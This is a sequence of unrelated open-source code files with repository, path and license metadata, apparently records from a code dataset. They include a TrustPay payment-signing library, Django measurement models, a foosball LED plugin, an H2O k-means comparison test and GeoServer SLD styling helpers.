checkin_render_layer.py S0001 layer1 1 lgt 1-20 D:/file_dir/plates.####.png") sys.exit(0) print(args, len(args)) if len(args) != 6: print("python checkin_render_layer.py <shot_code> <layer_name> <version> <context> <file_range> <file_pattern>") print("python checkin_render_layer.py S0001 layer1 1 lgt 1-20 D:/file_dir/plates.####.png") sys.exit(2) main(args, login=login)
epl-1.0
7,825,519,813,304,723,000
31.686667
142
0.563533
false
3.563227
false
false
false
beezz/trustpaylib
trustpaylib.py
1
17356
# -*- coding: utf-8 -*- # vim:fenc=utf-8 """ trustpaylib =========== TrustPay payment solution constants and utils. """ import sys import hmac import hashlib import collections try: unicode from urllib import urlencode except NameError: def unicode(s): return s from urllib.parse import urlencode #: Default test service url (TrustCard doesn't have testing service) TEST_API_URL = "https://ib.test.trustpay.eu/mapi/pay.aspx" #: TrustPay service url. API_URL = "https://ib.trustpay.eu/mapi/pay.aspx" #: TrustCard service url. TRUSTCARD_API_URL = "https://ib.trustpay.eu/mapi/cardpayments.aspx" __currencies = ( "CZK", "EUR", "GBP", "HUF", "PLN", "USD", "RON", "BGN", "HRK", "LTL", "TRY", ) #: Supported currencies. CURRENCIES = collections.namedtuple( "TrustPayCurrencies", __currencies, )(*__currencies) __languages = ( "bg", "bs", "cs", "de", "en", "es", "et", "hr", "hu", "it", "lt", "lv", "pl", "ro", "ru", "sk", "sl", "sr", "uk", ) #: Suported languages. LANGUAGES = collections.namedtuple( "TrustPayLanguages", __languages, )(*__languages) __countries = ( "CZ", "HU", "PL", "SK", "EE", "BG", "RO", "HR", "LV", "LT", "SI", "TR", "FI", ) __countries_verbose = ( "Czech Republic", "Hungary", "Poland", "Slovak Republic", "Estonia", "Bulgaria", "Romania", "Croatia", "Latvia", "Lithuania", "Slovenia", "Turkey", "Finland", ) #: Supported countries COUNTRIES = collections.namedtuple( "TrustPayCountries", __countries, )(*__countries) #: Supported countries verbose version. COUNTRIES_VERBOSE = collections.namedtuple( "TrustPayCountriesVerbose", __countries, )(*__countries_verbose) __ResultCodes = collections.namedtuple( "TrustPayResultCodes", [ "SUCCESS", "PENDING", "ANNOUNCED", "AUTHORIZED", "PROCESSING", "AUTHORIZED_ONLY", "INVALID_REQUEST", "UNKNOWN_ACCOUNT", "MERCHANT_ACCOUNT_DISABLED", "INVALID_SIGN", "USER_CANCEL", "INVALID_AUTHENTICATION", "DISPOSABLE_BALANCE", "SERVICE_NOT_ALLOWED", "PAYSAFECARD_TIMEOUT", "GENERAL_ERROR", "UNSUPPORTED_CURRENCY_CONVERSION", ] ) #: Result codes of redirects and notifications. RESULT_CODES = __ResultCodes( "0", "1", "2", "3", "4", "5", "1001", "1002", "1003", "1004", "1005", "1006", "1007", "1008", "1009", "1100", "1101", ) __rc_desc = collections.namedtuple( "TrustPayResultCodesDesc", ["short", "long"], ) #: Result codes of redirects and notifications. #: In verbose form with short and long description of result code. RESULT_CODES_DESC = { RESULT_CODES.SUCCESS: __rc_desc( "Success", "Payment was successfully processed.", ), RESULT_CODES.PENDING: __rc_desc( "Pending", "Payment is pending (offline payment)", ), RESULT_CODES.ANNOUNCED: __rc_desc( "Announced", ( "TrustPay has been notified that the client" "placed a payment order or has made payment," " but further confirmation from 3rd party is needed." ), ), RESULT_CODES.AUTHORIZED: __rc_desc( "Authorized", ( "Payment was successfully authorized. Another" " notification (with result code 0 - success)" " will be sent when TrustPay receives and processes" " payment from 3rd party." ), ), RESULT_CODES.PROCESSING: __rc_desc( "Processing", ( "TrustPay has received the payment, but it" " must be internally processed before it is" " settled on the merchant‘s account." ), ), RESULT_CODES.AUTHORIZED_ONLY: __rc_desc( "Authorized only", ( "Card payment was successfully authorized," " but not captured. Subsequent MAPI call(s)" " is (are) required to capture payment." ), ), RESULT_CODES.INVALID_REQUEST: __rc_desc( "Invalid request", "Data sent is not properly formatted.", ), RESULT_CODES.UNKNOWN_ACCOUNT: __rc_desc( "Unknown account", "Account with specified ID was not found.", ), RESULT_CODES.MERCHANT_ACCOUNT_DISABLED: __rc_desc( "Merchant's account disabled", "Merchant's account has been disabled.", ), RESULT_CODES.INVALID_SIGN: __rc_desc( "Invalid sign", "The message is not signed correctly.", ), RESULT_CODES.USER_CANCEL: __rc_desc( "User cancel", "Customer has cancelled the payment.", ), RESULT_CODES.INVALID_AUTHENTICATION: __rc_desc( "Invalid authentication", "Request was not properly authenticated", ), RESULT_CODES.DISPOSABLE_BALANCE: __rc_desc( "Disposable balance", "Requested transaction amount is greater than disposable balance.", ), RESULT_CODES.SERVICE_NOT_ALLOWED: __rc_desc( "Service not allowed", ( "Service cannot be used or permission to" " use given service has not been granted." ), ), RESULT_CODES.PAYSAFECARD_TIMEOUT: __rc_desc( "PaySafeCard timeout", "Cards allocation will be cancelled.", ), RESULT_CODES.GENERAL_ERROR: __rc_desc( "General Error", "Internal error has occurred.", ), RESULT_CODES.UNSUPPORTED_CURRENCY_CONVERSION: __rc_desc( "Unsupported currency conversion", "Currency conversion for requested currencies is not supported.", ), } #: TrustPay environment class #: Just attributes holder for TrustPay's variables. TrustPayEnvironment = collections.namedtuple( "TrustPayEnvironment", [ "api_url", "redirect_url", "success_url", "error_url", "cancel_url", "notification_url", "aid", "secret_key", "currency", "language", "country", ], ) TrustPayRequest = collections.namedtuple( "TrustPayRequest", [ "AID", "AMT", "CUR", "REF", "URL", "RURL", "CURL", "EURL", "NURL", "SIG", "LNG", "CNT", "DSC", "EMA", ], ) TrustPayNotification = collections.namedtuple( "TrustPayNotification", [ "AID", "TYP", "AMT", "CUR", "REF", "RES", "TID", "OID", "TSS", "SIG", ], ) TrustPayRedirect = collections.namedtuple( "TrustPayRedirect", ["REF", "RES", "PID"], ) def _build_nt_cls( cls, kw, fnc=lambda v: v if v is None else unicode(v), ): _kw = kw.copy() inst = cls(*[fnc(_kw.pop(attr, None)) for attr in cls._fields]) if _kw: raise ValueError("Got unexpected field names: %r" % _kw.keys()) return inst def build_redirect(**kw): return _build_nt_cls(TrustPayRedirect, kw) def build_notification(**kw): return _build_nt_cls(TrustPayNotification, kw) def build_pay_request(**kw): return _build_nt_cls(TrustPayRequest, kw) def build_test_environment(**kw): kw["api_url"] = kw.get("api_url", TEST_API_URL) return _build_nt_cls(TrustPayEnvironment, kw, fnc=lambda v: v) def build_environment(**kw): kw["api_url"] = kw.get("api_url", API_URL) return _build_nt_cls(TrustPayEnvironment, kw, fnc=lambda v: v) def sign_message(key, msg): if sys.version_info[0] == 3: msg, key = str.encode(msg), str.encode(key) return hmac.new(key, msg, hashlib.sha256).hexdigest().upper() def extract_attrs(obj, attrs): return [getattr(obj, attr) for attr in attrs] def merge_env_with_request( env, request, fnc=lambda v1, v2: v1 if v2 is None else v2, ): kw = {} kw['AID'] = fnc(env.aid, request.AID) kw['URL'] = fnc(env.redirect_url, request.URL) kw['RURL'] = fnc(env.success_url, request.RURL) kw['CURL'] = fnc(env.cancel_url, request.CURL) kw['EURL'] = fnc(env.error_url, request.EURL) kw['NURL'] = fnc(env.notification_url, request.NURL) kw['CUR'] = fnc(env.currency, request.CUR) kw['LNG'] = fnc(env.language, request.LNG) kw['CNT'] = fnc(env.country, request.CNT) return request._replace(**kw) def _build_link(url, query_dict, fmt="{url}?{params}"): return fmt.format(url=url, params=urlencode(query_dict)) def _filter_dict_nones(d): res = {} for key, value in d.items(): if value is not None: res[key] = value return res def _initial_data(pay_request): return _filter_dict_nones(pay_request._asdict()) def build_link_for_request(url, request): return _build_link(url, _initial_data(request)) class TrustPay(object): #: Requests attributes from which signature message is #: concatenated (in this specific order). SIGNATURE_ATTRS = ("AID", "AMT", "CUR", "REF") #: Notification signature attributes. NOTIFICATION_SIGNATURE_ATTRS = ( "AID", "TYP", "AMT", "CUR", "REF", "RES", "TID", "OID", "TSS" ) #: Not signed request required attributes. REQUEST_REQUIRED_ATTRS = ("AID", "CUR") #: Signed request required attributes. SIGNED_REQUEST_REQUIRED_ATTRS = REQUEST_REQUIRED_ATTRS + ( "AMT", "REF", "SIG") #: Supported currencies (:attr:`trustpaylib.CURRENCIES`) CURRENCIES = CURRENCIES #: Supported languages LANGUAGES = LANGUAGES #: Supported countries COUNTRIES = COUNTRIES RESULT_CODES = RESULT_CODES RESULT_CODES_DESC = RESULT_CODES_DESC def __init__(self, environment): self.environment = environment def sign_request(self, pay_request): """ Sign payment request. Args: pay_request (:class:`trustpaylib.TrustPayRequest`): Payment request already prepared for signing. Returns: New :class:`trustpaylib.TrustPayRequest` instance with `SIG` attribute set to generated signature. """ return pay_request._replace( SIG=self.pay_request_signature(pay_request)) def pay_request_signature(self, pay_request): """ Use environments secret key to generate hash to sign pay request. Args: pay_request (:class:`trustpaylib.TrustPayRequest`): Payment request already prepared for signing. Returns: Hash. """ return sign_message( self.environment.secret_key, self.create_signature_msg(pay_request), ) def merge_env_with_request(self, pay_request): """ Merge specific attributes of environment with payment request. Args: pay_request (:class:`trustpaylib.TrustPayRequest`): Payment request to merge. Returns: New :class:`trustpaylib.TrustPayRequest` instance with attributes merged with those in environment if not already set on `pay_request`. """ return merge_env_with_request( self.environment, pay_request, ) def finalize_request( self, pay_request, sign=True, validate=True, merge_env=True ): """ Raw payment request is merged with environment, signed and validated. Args: pay_request (:class:`trustpaylib.TrustPayRequest`): sign (bool): If `False`, don't sign pay request. validate (bool): If `False`, don't validate pay request. merge_env (bool): If `False`, don't merge pay request with env. Returns: New :class:`trustpaylib.TrustPayRequest` prepared for building link or creating form. """ pr = pay_request if merge_env: pr = self.merge_env_with_request(pay_request) if sign: pr = self.sign_request(pr) if validate: pr = self.validate_request(pr) return pr def build_link( self, pay_request, sign=True, validate=True, merge_env=True ): """ Finalizes raw payment request and generates redirect link. Args: pay_request (:class:`trustpaylib.TrustPayRequest`): sign (bool): If `False`, don't sign pay request. validate (bool): If `False`, don't validate pay request. merge_env (bool): If `False`, don't merge pay request with env. Returns: string: Redirect link. """ return _build_link( self.environment.api_url, self.initial_data( self.finalize_request( pay_request, sign=sign, validate=validate, merge_env=merge_env, ) ), ) def check_notification_signature(self, notification): """ Check if notification is signed with environment's secret key. Args: notification (:class:`trustpaylib.TrustPayNotification`) Returns: bool """ msg = unicode("").join( [self.environment.aid, ] + extract_attrs(notification, self.NOTIFICATION_SIGNATURE_ATTRS[1:]) ) return sign_message( self.environment.secret_key, msg) == notification.SIG @classmethod def create_signature_msg(cls, pay_request): """ Concatenate set of payment request attributes and creates message to be hashed. Args: pay_request (:class:`trustpaylib.TrustPayRequest`): Returns: string: Signature message. """ return unicode("").join( [ attr for attr in cls.extract_signature_attrs(pay_request) if attr is not None ] ) @classmethod def get_result_desc(cls, rc): """Returns description of result code. Args: rc (int|string): Result code from redirect or notification. Returns: Named tuple with `short` and `long` attributes for short, long description. (:attr:`trustpaylib.RESULT_CODES_DESC`) >>> TrustPay.get_result_desc(1001).short 'Invalid request' >>> TrustPay.get_result_desc(1001).long 'Data sent is not properly formatted.' """ return cls.RESULT_CODES_DESC[str(rc)] @classmethod def get_result_desc_from_notification(cls, notif): return cls.get_result_desc(notif.RES) @classmethod def get_result_desc_from_redirect(cls, redirect): return cls.get_result_desc(redirect.RES) @classmethod def validate_currency(cls, pay_request): if ( pay_request.CUR is not None and pay_request.CUR not in cls.CURRENCIES ): raise ValueError( "Currency [%r] not in supported currencies [%r]" % ( pay_request.CUR, cls.CURRENCIES, ) ) @classmethod def validate_language(cls, pay_request): if ( pay_request.LNG is not None and pay_request.LNG not in cls.LANGUAGES ): raise ValueError( "Language [%r] not int supported languages [%r]" % ( pay_request.LNG, cls.LANGUAGES, ) ) @classmethod def validate_country(cls, pay_request): if ( pay_request.CNT is not None and pay_request.CNT not in cls.COUNTRIES ): raise ValueError( "Country [%r] not int supported countries [%r]" % ( pay_request.CNT, cls.COUNTRIES, ) ) @classmethod def validate_request(cls, pay_request): """Validate payment request. Check if all attributes for signed/non-signed payment request are present. Check if amount has at max two decimal places. On validation errors, raises :exc:`ValueError`. Args: pay_request (:class:`trustpaylib.TrustPayRequest`): Returns: Given `pay_request`. Raises: ValueError """ missing = [] required_attrs = ( cls.REQUEST_REQUIRED_ATTRS if pay_request.SIG is None else cls.SIGNED_REQUEST_REQUIRED_ATTRS ) for attr in required_attrs: if attr not in cls.initial_data(pay_request): missing.append(attr) if pay_request.AMT is not None and '.' in pay_request.AMT: if len(pay_request.AMT.split('.')[1]) > 2: raise ValueError( "Amount can have at max" " 2 decimal places. [%s]" % pay_request.AMT) if missing: raise ValueError("Required attributes missing: %r" % missing) cls.validate_currency(pay_request) cls.validate_language(pay_request) cls.validate_country(pay_request) return pay_request @classmethod def extract_signature_attrs(cls, pay_request): return extract_attrs(pay_request, cls.SIGNATURE_ATTRS) @staticmethod def initial_data(pay_request): return _initial_data(pay_request) if __name__ == "__main__": import doctest doctest.testmod()
bsd-3-clause
4,386,366,306,178,861,600
26.546032
78
0.576755
false
3.842781
false
false
false
MOOCworkbench/MOOCworkbench
quality_manager/models.py
1
2510
from django.db import models from django.template.defaultfilters import slugify from model_utils.models import TimeStampedModel from experiments_manager.models import ChosenExperimentSteps class ExperimentMeasure(models.Model): name = models.CharField(max_length=255, editable=False) description = models.TextField() high_message = models.CharField(max_length=255, default='High') medium_message = models.CharField(max_length=255, default='Medium') low_message = models.CharField(max_length=255, default='Low') def __str__(self): return 'Measurement of {0}'.format(self.name) def get_low_message(self): return '{0}: {1}'.format(self.name, self.low_message) def get_medium_message(self): return '{0}: {1}'.format(self.name, self.medium_message) def get_high_message(self): return '{0}: {1}'.format(self.name, self.high_message) def slug(self): return slugify(self.name).replace('-', '_') class RawMeasureResult(models.Model): key = models.CharField(max_length=255) value = models.CharField(max_length=1000) def __str__(self): return 'Key: {0} with value: {1}'.format(self.key, str(self.value)) class ExperimentMeasureResult(TimeStampedModel): HIGH = 'H' MEDIUM = 'M' LOW = 'L' SCALE = ( (HIGH, 'High'), (MEDIUM, 'Medium'), (LOW, 'Low'), ) step = models.ForeignKey(to=ChosenExperimentSteps) measurement = models.ForeignKey(to=ExperimentMeasure) result = models.CharField(max_length=1, choices=SCALE) raw_values = models.ManyToManyField(to=RawMeasureResult) def get_message(self): message_dict = {ExperimentMeasureResult.LOW: self.measurement.get_low_message(), ExperimentMeasureResult.MEDIUM: self.measurement.get_medium_message(), ExperimentMeasureResult.HIGH: self.measurement.get_high_message()} if self.result: return message_dict[self.result] return 'Result missing' def get_class(self): style_classes = {ExperimentMeasureResult.LOW: 'danger', ExperimentMeasureResult.MEDIUM: 'warning', ExperimentMeasureResult.HIGH: 'success'} if not self.result: return "default" return style_classes[self.result] def slug(self): return self.measurement.slug() def __str__(self): return "Workbench scan of {0}".format(self.measurement.name)
mit
-3,190,671,055,506,624,500
32.466667
94
0.650199
false
3.903577
false
false
false
swehner/foos
plugins/leds.py
1
3191
#!/usr/bin/env python import time import sys import threading import queue import collections from foos.bus import Bus class Pattern: def __init__(self, time, leds=[]): self.time = time self.leds = leds def flatten(l): for el in l: if isinstance(el, collections.Iterable): for sub in flatten(el): yield sub else: yield el class Plugin: def __init__(self, bus): self.queue = queue.Queue() self.bus = bus fmap = {'score_goal': lambda d: self.setMode(pat_goal), 'upload_ok': lambda d: self.setMode(pat_ok), 'tv_standby': lambda d: self.setMode(pat_standby, loop=True), 'tv_on': lambda d: self.setMode([]), 'button_will_upload': lambda d: self.setMode(pat_upload_feedback), 'upload_error': lambda d: self.setMode(pat_error)} self.bus.subscribe_map(fmap) self.thread = threading.Thread(target=self.run) self.thread.daemon = True self.thread.start() def run(self): while True: loop, m = self.queue.get() first = True while first or loop: first = False for p in flatten(m): if self.__canRun(): self.setLeds(p.leds) self.__safeSleep(p.time) else: loop = False break # reset leds self.setLeds() def __safeSleep(self, t): start = time.time() while (time.time() < start + t) and self.__canRun(): time.sleep(0.05) def __canRun(self): return self.queue.empty() def setLeds(self, leds=[]): self.bus.notify("leds_enabled", leds) def setMode(self, mode, loop=False): self.stop = True self.queue.put((loop, mode)) pat_reset = 3 * [Pattern(0.2, ["BI", "BD", "YI", "YD"]), Pattern(0.1), Pattern(0.2, ["BI", "BD", "YI", "YD"]), Pattern(1)] pat_standby = [Pattern(1, ["OK"]), Pattern(1)] pat_goal = [[Pattern(0.1, ["BD", "YD"]), Pattern(0.1, ["OK"]), Pattern(0.1, ["BI", "YI"])], 3 * [Pattern(0.1), Pattern(0.1, ["BI", "BD", "OK", "YI", "YD"])]] pat_ok = [Pattern(0.3, ["OK"])] pat_upload_feedback = 2 * [Pattern(0.1, ["OK"]), Pattern(0.1)] pat_error = 2 * [Pattern(0.3, ["YD", "BD"]), Pattern(0.3)] pat_demo = [Pattern(1, ["BD"]), Pattern(1, ["BI"]), Pattern(1, ["YD"]), Pattern(1, ["YI"]), Pattern(1, ["OK"])] if __name__ == "__main__": def write_data(led_event): leds = led_event.data print("\r", end="") for led in ["BD", "BI", "OK", "YI", "YD"]: print("0" if led in leds else " ", end=" ") sys.stdout.flush() bus = Bus() bus.subscribe(write_data, thread=True) controller = Plugin(bus) controller.setMode(pat_standby, loop=True) time.sleep(5) controller.setMode(pat_goal) time.sleep(5)
gpl-3.0
-5,291,139,710,385,785,000
26.508621
82
0.483861
false
3.468478
false
false
false
ChristosChristofidis/h2o-3
h2o-py/tests/testdir_hdfs/pyunit_NOPASS_HDFS_kmeans_mllib_1_large.py
1
2412
#---------------------------------------------------------------------- # Purpose: This test compares k-means centers between H2O and MLlib. #---------------------------------------------------------------------- import sys sys.path.insert(1, "../../") import h2o import numpy as np def kmeans_mllib(ip, port): h2o.init(ip, port) # Check if we are running inside the H2O network by seeing if we can touch # the namenode. running_inside_h2o = h2o.is_running_internal_to_h2o() if running_inside_h2o: hdfs_name_node = h2o.get_h2o_internal_hdfs_name_node() hdfs_cross_file = "/datasets/runit/BigCross.data" print "Import BigCross.data from HDFS" url = "hdfs://{0}{1}".format(hdfs_name_node, hdfs_cross_file) cross_h2o = h2o.import_frame(url) n = cross_h2o.nrow() err_mllib = np.genfromtxt(h2o.locate("smalldata/mllib_bench/bigcross_wcsse.csv"), delimiter=",", skip_header=1) ncent = [int(err_mllib[r][0]) for r in range(len(err_mllib))] for k in ncent: print "Run k-means++ with k = {0} and max_iterations = 10".format(k) cross_km = h2o.kmeans(training_frame = cross_h2o, x = cross_h2o, k = k, init = "PlusPlus", max_iterations = 10, standardize = False) clust_mllib = np.genfromtxt(h2o.locate("smalldata/mllib_bench/bigcross_centers_" + str(k) + ".csv"), delimiter=",").tolist() clust_h2o = cross_km.centers() # Sort in ascending order by first dimension for comparison purposes clust_mllib.sort(key=lambda x: x[0]) clust_h2o.sort(key=lambda x: x[0]) print "\nMLlib Cluster Centers:\n" print clust_mllib print "\nH2O Cluster Centers:\n" print clust_h2o wcsse_mllib = err_mllib[err_mllib[0:4,0].tolist().index(k)][1] wcsse_h2o = cross_km.tot_withinss() / n print "\nMLlib Average Within-Cluster SSE: \n".format(wcsse_mllib) print "H2O Average Within-Cluster SSE: \n".format(wcsse_h2o) assert wcsse_h2o == wcsse_mllib, "Expected mllib and h2o to get the same wcsse. Mllib got {0}, and H2O " \ "got {1}".format(wcsse_mllib, wcsse_h2o) if __name__ == "__main__": h2o.run_test(sys.argv, kmeans_mllib)
apache-2.0
-4,750,684,882,160,498,000
42.872727
119
0.548093
false
3.272727
false
false
false
GeographicaGS/GeoServer-Python-REST-API
src/geoserverapirest/ext/sld/sld.py
1
15360
#!/usr/bin/env python # coding=UTF-8 import geoserverapirest.ext.sld.core as core, geoserverapirest.ext.sld.color as color import geoserverapirest.ext.sld.ranges as ranges """ This set of classes works as helpers to construct SLD and should be the only entry point to this module. They are designed to work supplying dictionaries of properties so they can be used by means of defining objects via dictionaries. """ strokeLineJoin = core.strokeLineJoin class Automation(object): """ Automation objects base class. All this classes do something in the __init__ and store the final output in the out variable. This out variable can be retrieved just by calling the object as WhateverAutomationObject(). """ out = None def __call__(self): """ Treat self.sld() as itself. """ return self.out # ----------------- # Semiology Classes # ----------------- class SemiologyStroke(Automation): """ Automation for stroke semiology. Takes a stroke specification as a dictionary and stores a sld.GsSldStrokeSymbolizer: stroke = { "class": sld.SemiologyStroke, "color": "#3e3e3e", "width": 2, "linejoin": strokeLineJoin["bevel"] } """ def __init__(self, params): self.out = core.GsSldStrokeSymbolizer(params["color"], params["width"], params["linejoin"]) class SemiologyFill(Automation): """ Automation for fill semiology. Takes a fill specification as a dictionary and stores a sld.GsSldFillSymbolizer: fill = { "class": sld.SemiologyFill, "color": "#e3e2e1" } """ def __init__(self, params): self.out = core.GsSldFillSymbolizer(params["color"]) class SemiologyPolygon(Automation): """ Automation for polygon semiology. Takes a polygon symbol specification as a dictionary and stores a sld.GsSldPolygonSymbolizer: polygonStrokeFill = { "class": sld.SemiologyPolygon, "stroke": stroke, "fill": fill } """ def __init__(self, params): self.out = core.GsSldPolygonSymbolizer() if "stroke" in params.keys(): self.out.addSymbol(SemiologyStroke(params["stroke"])()) if "fill" in params.keys(): self.out.addSymbol(SemiologyFill(params["fill"])()) class SemiologyPolygonSimpleRamp(Automation): """ Automation for a polygon simple ramp. Takes a polygon simple ramp specification as a dictionary and stores a list of sld.GsSldPolygonSymbolizer: polygonSimpleRamp = { "class": sld.SemiologyPolygonSimpleRamp, "stroke": stroke, "low": "#dedece", "high": "#4a4140" } """ def __init__(self, params, steps): self.out = [] c = color.Color() colors = c.colorRamp(params["low"], params["high"], steps) for i in range(0, steps): o = core.GsSldPolygonSymbolizer() if "stroke" in params.keys(): o.addSymbol(SemiologyStroke(params["stroke"])()) o.addSymbol(SemiologyFill({"color": colors[i]})()) self.out.append(o) class SemiologyPolygonDoubleRamp(Automation): """ Automation for a polygon double ramp. Takes a polygon double ramp specification as a dictionary and stores a list of sld.GsSldPolygonSymbolizer: polygonDoubleRamp = { "class": sld.SemiologyPolygonDoubleRamp, "stroke": stroke, "low": "#ff0000", "middle": "#ffffff", "high": "#0000ff" } """ def __init__(self, params, sidesteps): self.out = [] c = color.Color() colors = c.colorDualRamp(params["low"], params["middle"], params["high"], sidesteps) for i in range(0, (sidesteps*2)+1): o = core.GsSldPolygonSymbolizer() if "stroke" in params.keys(): o.addSymbol(SemiologyStroke(params["stroke"])()) o.addSymbol(SemiologyFill({"color": colors[i]})()) self.out.append(o) class SemiologyPolygonCustomRamp(Automation): """ Automation for a polygon custom ramp. Takes a polygon custom ramp specification as a dictionary and stores a list of sld.GsSldPolygonSymbolizer: polygonCustomRamp = { "class": sld.SemiologyPolygonCustomRamp, "stroke": stroke, "colors": ["#ff0000", "#00ff00", "#0000ff"] } """ def __init__(self, params): self.out = [] for i in params["colors"]: o = core.GsSldPolygonSymbolizer() if "stroke" in params.keys(): o.addSymbol(SemiologyStroke(params["stroke"])()) o.addSymbol(SemiologyFill({"color": i})()) self.out.append(o) # ----------------- # Condition Classes # ----------------- class ConditionGtoe(Automation): """ Automation for GTOE condition. Takes a condition specification as a dictionary and stores a GsSldConditionGtoe: ConditionGtoe = { "class": sld.ConditionGtoe, "attribute": "area", "value": 20000000 } """ def __init__(self, params): self.out = core.GsSldConditionGtoe(params["attribute"], params["value"]) class ConditionLtoe(Automation): """ Automation for LTOE condition. Takes a condition specification as a dictionary and stores a GsSldConditionLtoe: ConditionLtoe = { "class": sld.ConditionLtoe, "attribute": "area", "value": 20000000 } """ def __init__(self, params): self.out = core.GsSldConditionLtoe(params["attribute"], params["value"]) class ConditionEqual(Automation): """ Automation for EQUAL condition. Takes a condition specification as a dictionary and stores a GsSldConditionEqual: ConditionEqual = { "class": sld.ConditionEqual, "attribute": "PROVINCIA", "value": "Córdoba" } """ def __init__(self, params): self.out = core.GsSldConditionEqual(params["attribute"], params["value"]) class ConditionAnd(Automation): """ Automation for AND condition. Takes a condition specification as a dictionary and stores a GsSldConditionAnd: conditionAnd = { "class": sld.ConditionAnd, "c0": conditionLtoe, "c1": conditionEqual } """ def __init__(self, params): self.out = core.GsSldConditionAnd(params["c0"]["class"](params["c0"])(), params["c1"]["class"](params["c1"])()) class ConditionOr(Automation): """ Automation for OR condition. Takes a condition specification as a dictionary and stores a GsSldConditionOr: conditionOr = { "class": sld.ConditionOr, "c0": conditionLtoe, "c1": conditionEqual } """ def __init__(self, params): self.out = core.GsSldConditionOr(params["c0"]["class"](params["c0"])(), params["c1"]["class"](params["c1"])() ) # ----------------- # Ranges automation # ----------------- class RangesQuartileMiddle(Automation): """ TODO: Redo this Automation for a Jenks middle range calculation. :param data: Data to create intervals from. :type data: List :param sideIntervals: Number of side intervals :type sideIntervals: integer :param precision: Precision :type precision: integer """ def __init__(self, data, sideIntervals, middleValue, precision): a = ranges.Range() self.out = a.quartileMiddleInterval(data, sideIntervals, middleValue, precision) class RangesQuartile(Automation): """ Automation for a quartile range calculation. :param data: Data to create intervals from. :type data: List :param intervals: Number of intervals :type intervals: integer :param precision: Precision :type precision: integer """ def __init__(self, data, intervals, precision): a = ranges.Range() self.out = a.quartileInterval(data, intervals, precision) class RangesEqualMiddle(Automation): """ TODO: Redo this Automation for a Jenks middle range calculation. :param data: Data to create intervals from. :type data: List :param sideIntervals: Number of side intervals :type sideIntervals: integer :param precision: Precision :type precision: integer """ def __init__(self, data, sideIntervals, middleValue, precision): a = ranges.Range() self.out = a.equalMiddleInterval(data, sideIntervals, middleValue, precision) class RangesEqual(Automation): """ Automation for a equal range calculation. :param data: Data to create intervals from. :type data: List :param intervals: Number of intervals :type intervals: integer :param precision: Precision :type precision: integer """ def __init__(self, data, intervals, precision): a = ranges.Range() self.out = a.equalInterval(data, intervals, precision) class RangesJenksMiddle(Automation): """ Automation for a Jenks middle range calculation. :param data: Data to create intervals from. :type data: List :param sideIntervals: Number of side intervals :type sideIntervals: integer :param precision: Precision :type precision: integer """ def __init__(self, data, sideIntervals, middleValue, precision): a = ranges.Range() self.out = a.jenksMiddleInterval(data, sideIntervals, middleValue, precision) class RangesJenks(Automation): """ Automation for a jenks range calculation. :param data: Data to create intervals from. :type data: List :param intervals: Number of intervals :type intervals: integer :param precision: Precision :type precision: integer """ def __init__(self, data, intervals, precision): a = ranges.Range() self.out = a.jenksInterval(data, intervals, precision) # --------------------- # Full style automation # --------------------- class StyleBuilder(object): """ This is the base style builder. :param namedLayerName: Name of the named layer :type namedLayerName: String :param styleName: Name of the style :type styleName: String :param ruleNames: A list of Strings with the names of the rules. :type ruleNames: List :param conditions: A list of geoserverapirest.ext.sld.core.GsSldConditionXXX with the conditions. :type conditions: List :param symbols: A list of geoserverapirest.ext.sld.core.GsSldPolygonSymbolizer with the symbolizers. :type symbols: List """ @staticmethod def build(namedLayerName, styleName, ruleNames, conditions, symbols): ft = core.GsSldFeatureTypeStyle() filters = [] if conditions is not None: for i in conditions: if i is not None: filter = core.GsSldFilter() filter.addCondition(i) filters.append(filter) else: filters.append(i) for i in range(0, len(ruleNames)): r = core.GsSldRule(ruleNames[i].replace(" ", "_").lower(), ruleNames[i]) r.addSymbolizer(symbols[i]) if filters<>[]: if filters[i] is not None: r.addFilter(filters[i]) ft.addRule(r) us = core.GsSldUserStyle(styleName) us.addFeatureTypeStyle(ft) nl = core.GsSldNamedLayer(namedLayerName) nl.addUserStyle(us) root = core.GsSldRoot() root.addNamedLayer(nl) return root class StyleCustom(Automation): """ Automation for a full custom SLD style. Takes a style specification as a dictionary and builds a full SLD. See test_18_automation.py for examples. """ def __init__(self, params): symbols = [a["class"](a)() for a in params["symbols"]] conditions = [a["class"](a)() for a in params["conditions"]] if "conditions" in params.keys() else None self.out = StyleBuilder.build(params["namedlayername"], params["stylename"], params["rulenames"], conditions, symbols) class StyleSimpleIntervals(Automation): """ Automation for a simple intervals SLD style. Takes a style specification as a dictionary and builds a full SLD. See test_18_automation.py for examples. """ def __init__(self, params): data = params["datasource"]["class"](params["datasource"])() rang = params["rangetype"](data, params["steps"], params["precision"])() conditions = [] for r in rang: c = {"class": ConditionAnd, "c0": { "class": ConditionGtoe, "attribute": params["datasource"]["attributename"], "value": r[0]}, "c1": { "class": ConditionLtoe, "attribute": params["datasource"]["attributename"], "value": r[1]}} conditions.append(c["class"](c)()) symbols = params["ramp"]["class"](params["ramp"], params["steps"])() rn = ranges.RuleNames() ruleNames = rn.ruleNames(rang, params["rulenames"]["mono"], params["rulenames"]["dual"], params["rulenames"]["lambda"]) self.out = StyleBuilder.build(params["namedlayername"], params["stylename"], ruleNames, conditions, symbols) class StyleCenteredIntervals(Automation): """ Automation for a double ramp. Takes a style specification as a dictionary and builds a full SLD. See test_18_automation.py for examples. """ def __init__(self, params): data = params["datasource"]["class"](params["datasource"])() # Data below and above median below = [a for a in data if a<params["mediandata"]] above = [a for a in data if a>params["mediandata"]] #TODO: Erase median Ranges. A waste of time belowIntervals = params["rangetype"](below, params["steps"], params["precision"])() aboveIntervals = params["rangetype"](above, params["steps"], params["precision"])() belowIntervals.append([params["mediandata"], params["mediandata"]]) belowIntervals.extend(aboveIntervals) conditions = [] # TODO: This is duplicated in the class above, take apart for r in belowIntervals: c = {"class": ConditionAnd, "c0": { "class": ConditionGtoe, "attribute": params["datasource"]["attributename"], "value": r[0]}, "c1": { "class": ConditionLtoe, "attribute": params["datasource"]["attributename"], "value": r[1]}} conditions.append(c["class"](c)()) symbols = params["ramp"]["class"](params["ramp"], params["steps"])() rn = ranges.RuleNames() ruleNames = rn.ruleNames(belowIntervals, params["rulenames"]["mono"], params["rulenames"]["dual"], \ params["rulenames"]["lambda"]) self.out = StyleBuilder.build(params["namedlayername"], params["stylename"], ruleNames, conditions, symbols)
mit
7,179,470,238,680,441,000
26.824275
127
0.601081
false
3.960547
false
false
false
openstack/os-win
os_win/tests/unit/utils/test_jobutils.py
1
14327
